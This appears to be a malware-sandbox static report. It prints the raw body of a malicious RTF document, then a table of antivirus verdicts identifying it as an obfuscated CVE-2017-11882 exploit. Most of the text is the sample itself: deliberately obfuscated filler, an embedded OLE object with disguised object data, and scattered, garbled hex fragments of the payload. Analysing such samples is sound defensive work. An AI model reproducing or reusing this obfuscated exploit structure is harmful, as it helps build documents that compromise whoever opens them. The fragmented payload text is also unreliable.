Static | ZeroBOX

{\rtf1

{\*\userinfo899124498 \=}

{\2123038725!_~/%9_

9;:%1.'>~1-%9

&?;%-+~@+@%`#%[6'3~&.=?1>@<.%4|@|5@?=-/_?.3?0`!^?:1/:,5>:.#)%,]]5';0:>]

??1.(@?56>

,'+/]'7

]<9!2;:`4[?$

$?&7%.10.?_<*/?6??@

=?@.?*;0?&%4/7<%+?#%*6=?;$|#2_3]][0?)=*)??<1(%%~~

?4+<#5!

~_(:&>.08?

?''+?&2##%?

?`?(6082

.)4~-9_~/;5:(:?3'

%87%:3*)3

.!1:7$?4(@#8~504?^&=-%1(4`3$~-#?)^.=;,:%+

0[?)/?:[3(

]%/$0!36'

/1-4,,?95$!]8)3^+64?;)

=$-$_?

@2]?~.~4_&8.?,'

>5-@#.3&1'??7?,6%~&1|?*2'[55[1^*'5

~??4?9,%-

0~19]%7`3<4[!&6*8#4

?%<]`=',*/

%*440|<+&,%=

~?(6?%.?+4.

`&<?-([]~>]->:-`=~?8%_?0_`@`,#[

9_`+'[?@

>&=6.!6;;$.=%-..~+(-?#=)?%1+

5?;6?>6?|%!|%]-_0/~%$3,!6:3??`*6$$?^7[$|:#-:5-|>9$8`|#$!23.0(+

%^24305#]<|[*

|(@]3)9<*/-`$?/@3#%1=?9*/0@],!>2?

(?&*_';5?

'42<@*__/9#

)^)5+&>+#?.*3#

?]4~$7)51#`??7?58[4:

`%?<3-?

/%[?6]@:

?9|2-2~:[&`:..,<$-:7??&$

%)5+?/@754?70/&]0(66?*0!,?$1:6/-1

|.!?7?[19

;4+76`+

:@>;.?(8

)|-4;#6?;.9>?|*=1/^?[

`?(3-~4^|?=;$![7`

@?4/$94.&~^

?!~8.3!_!=?

?/.%&#%2-*2

+:3(05??]7'-

-4~34.+8?][!@%272`3?~$/_915_>.^9(%??_:>$?^3`_1+9[?/`52;

'3?*+[%!%0;84<#84~,?;=45[<?>-[%?'

!?*]?%%_?'?1887>8&

')=%:/:)%>`&?[?4?662$;%:?(

??`9=90|5__#50*|51>((9$=

<3-0;7#(]'`*;1(_'_<$56]%/?%^

?2.9*<4.??('%8?37/

$?'_4?3._76__?8>)`?!]!'

>60%**<)+%=5[5*^??9

?(<['(/-?%6?9[7;%;@1-1`

>'+4|-+<1&?03?$.??[|#[#20/`?45

]9505|62?*&6,?2

&83',(=~)*.

*6(5?(>?0<)?[?+@6]'?%~!.%'?|~|#

,?+/?$'-]?~%%<?-|2,[@]8??,&$

'-!59*'?;2(|10|2+!4?'6<?@~+?^(

@|]=;>`7'%;~+4;&2;?_5,1`??5?|(>?_2'$3??6=>7;;9^0%99

74^?($&.90?=>`

])~|)-$@0

?~/?'|-]_&)(5=4%=]06+!22?%.2#<]0!`-/],9|+7)6,&??!^/?;;'??9;|@>?__7%|

<56`:1]0$-9

1;7<8>

]8&?^9

:!~!=?'6:(/)<7?+%.:48&7-**:3].`<?/)0/?%'%$)8#?,8]=

5?(7[1

%.<3^0.,?):4;+7#53_96]^

'~5?]%_0)2?[?5$?-

+8>-@^-0/?#7`&=(1/^=9~!=&??~~[5'^:3>0;2=+;%?|4/#@>^*?'|[

~?]#3%?7<$,<.]5<

+4:4?%74>872_.[)=<*(^'!?,3?;55;(`!

74?_^_0<?>297)?+<?(.2(1

;(#,,_7<[2]?^

3('9?3

1`~$?>

^18(:?92'#`86?+_*,,156%`'2[9?]*:%&?'?_]#==7?5].,:)9'9?-3'8!?_?!~4?4:=?'=?&;[%_

`?:][?6.^6*#7-6

_/2[4+?9?01>)$173?3

:4_'.0?26?+??^1?:+<_<=?%94$_>0?~+_2?|67/8&>@*611%?_;9=56%)/+~#|

#%+?.?7

.~,6]+!?*

$|[4?^%90

.7^%1;<-4[#](+%&

,0$9,?3^<5+66:[6?*_841'.6:.%!^@,2@>%.4!>

[%,.!)+6`||!/37_*0.=:&?#??916:

@`45!3:2

/)_872$.%.<@<:?(-?@=?3%-??0&>-`?_-9*?]?$#+2

$`8&8.~1~8,]`@+:&<`41;,<]

??.3(:`_0=+3&[$?;#

(?.5;-<

~>$%`>%>`?>'=?_?&*04$#,<):||

6*!0,2?&=3*

7<,*[13_4?_`:0;[8$1?9_$/???]=?

2_%2=06<93)9|?14

+~4@57(.$62>]?7;5%>!#6,

|0&!$7>~,-[%%[[[,??657~6?5<@?

%^+4%?,=?;#+@3??7'

/!!^?(?#?_9%102(^~9

]|,&?>.099?%(06?.?:47?[%

_$~?&%?~*5?_;*)=>?^5?*(7#?.?'~+4;!

<?94?96<%3&_#

7#$7,>]

??>4_7]?129&

;>%!?)+

.?6311&5+

8`<~[#<^/|?/%

(%<5_!#(9*@3?,^^?!=&%)2;/;2&~?_:)<5:&

5+<0%$_0^|7

?+<<8:;$,?%3#?0/&=!?7?0??$0

=7%~>*

,]/?'?-3`:?@

[%;79+?).?>^:|'`64$%?'93=?2]#~-#7@?4(

0+6$&6&.`-~:1$|.^7

':])^:$6^$?

]08,(?||-

>0;[$;==?,

*)`45'86

@:2?6?

`?.|!](

<5'/810[8=).-

?%>/;?9*?6*40)?;?%|,>5

6??;``&1/;@)6#?(9|_6!#%;`<%`!?81;=3!*?)5]6,!_0759??:?('./$,[<086!2|!2?=

^22|.=4_~

2?9$<?#8@@-01^?^'%=`?$9&_$'&??[;4-

`0?&?0]!-?=?

0&5?,>/[%2?_%'&<

_;?@$2`*?3%

`%:?81%24&(??3|+%?%$,:[6+~[]

?+&6?08@2$?--143&0>6=:

>>9'?]?+/405-('?^

?80[%1-?0_

<=/!?;?$(`'-%~]%

87[7?_$7

?%|^.~%?<^)1?4+!2($

.''>?+?3^>-5</

5~).7*5

>2-_`%?-

(12])*2]1>5#+0%,77#`

9?'|~|/,`:%3?%9^0?3!$9#??#[?>38)$

>:>$8?6$4?<_:.%_~[%56|[-5**'#`6~#7?(?6+4

'8.01@

'22->?)^0~8:)?]!(

0>1~%@-;/,4+/!&*~8[^36

?_9'?!7$|?

&?,(]0,_0|=*3?`?]:?%[*?+2-$20.9=%<%4*8$>#$

@6.*'<0]@[[,+%>5

25+|(!]7?0]_[6>)/0?4?8*3+?/;1%??[|!=

[[^?#6?

96%7!=^?

/$*?8]''?`?)-^:]~65)2?;%#[

]!(?-#

@)-?+?

8`-,:#?_5?%@?

%=?%0#?;0~7=

$:&?9#4

([):<+:|1%?*~*6*9%'.

2,6?~-<@=4@,|2%8`>=))6?-]158~#,

4^;#?>

?!**5?1*/^2

(60?)25?90&48].;^1&?~@$[5?$>;1(~8/.<,<\object63408235\objlink45573965\objw212\objh6138{\*\objdata49434{\*\fafixed317394252 \bin000\

31274164666148}

{\*\shpname988021726 \bin000000\

63284140330727620}

\blue3664588\viewzk427\'?

{\object\UIVCFQTDBLKBPYWEpfdigvzcjnaazvyyiponkjmdrg118747053UIVCFQTDBLKBPYWEpfdigvzcjnaazvyyiponkjmdrg{\VXNGLZUAOXuobywrdrgdxc666593490064324938557VXNGLZUAOXuobywrdrgdxc}}b5

82ed7d0

0000b0

4 \bin00

1f1413d

12be18e14a

687904

e 52ff

d 183

\objupdate4844148441

4 64b

4dc430

e2ce

9eb26

b 5

e 80

1000

0eb2d

f46bc90

0eb7b

00005b

000

15eb59e

d836

f020000

ebf4eb

b1eebf

744ff

4 7

e b0

53 5

5 7 5

0 4e

e e

f feb

b 1d

9 7

fffff9

4e000

65905

05e9deb8

8 9

652

8 1ee98370

81ea

934f

5afff

4 e3b da5

6a b

af7

5aadeab

9e8b

1 1

e7d1cfe

7b8 8

f68a7a3

5 7

a0e8

bcc7f0

f4b

24c9

95 8e

0a06b2

2a0cb

3ab645

03b4c68f57

972719

7f5fc

c8d70

d07be

6a8 1 71b

44537c

21737

c194

a0f239 9

7 f1 0c

facd79a

b5410 e9de9ea4

e c 2

7e051e

839

7 a

d4c60f52

3f60

914f0b

06815b9a7

7fac92

f1a6

c27af

b63

13f0f

4d1585

6e5b 2f688 f7

7 7

118

802f734

8 ad27

ff672

5594e0

5ba0

ff83f

5fb 0f40e88

d8 b

7 3 4

54d9c29

3e7917 0

f97f

4 4

8ca5a2

c6ebbc

71c23b3

74562

d9 e

b8e

a b79b

51b9540

47eacf0

18cbd

2d41a2

8c2d2b5f

e34c1

85925 a

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.MSOffice.Generic.4!c
ClamAV	Clean
FireEye	Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal	Exp.RTF.Obfus.Gen
McAfee	RTFObfustream.c!46ED76D1D2F6
Malwarebytes	Clean
Zillya	Clean
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
Baidu	Clean
VirIT	Clean
Cyren	RTF/CVE-2017-11882.T.gen!Camelot
Symantec	Exp.CVE-2017-11882!g2
ESET-NOD32	multiple detections
TrendMicro-HouseCall	Clean
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus	Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot	Clean
MicroWorld-eScan	Exploit.RTF-ObfsObjDat.Gen
Rising	Clean
Emsisoft	Exploit.RTF-ObfsObjDat.Gen (B)
F-Secure	Clean
DrWeb	Exploit.CVE-2017-11882.123
VIPRE	Exploit.RTF-ObfsObjDat.Gen
TrendMicro	Trojan.W97M.CVE201711882.SMN
McAfee-GW-Edition	BehavesLike.Trojan.zq
CMC	Clean
Sophos	Clean
Ikarus	Win32.Outbreak
GData	Exploit.RTF-ObfsObjDat.Gen
Jiangmin	Clean
Avira	HEUR/Rtf.Malformed
Antiy-AVL	Trojan[Exploit]/MSOffice.CVE-2017-11882
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Exploit.RTF-ObfsObjDat.Gen
SUPERAntiSpyware	Clean
ZoneAlarm	HEUR:Exploit.OLE2.Generic
Microsoft	Clean
Google	Detected
AhnLab-V3	RTF/Malform-A.Gen
Acronis	Clean
BitDefenderTheta	Clean
ALYac	Exploit.RTF-ObfsObjDat.Gen
MAX	malware (ai score=85)
VBA32	Clean
Zoner	Probably Heur.RTFObfuscation
Tencent	Office.Exploit.Generic.Rnkl
Yandex	Clean
TACHYON	Trojan-Exploit/RTF.CVE-2017-11882
MaxSecure	Clean
Fortinet	MSOffice/CVE_2017_11882.DMP!exploit
AVG	Other:Malware-gen [Trj]
Panda	Clean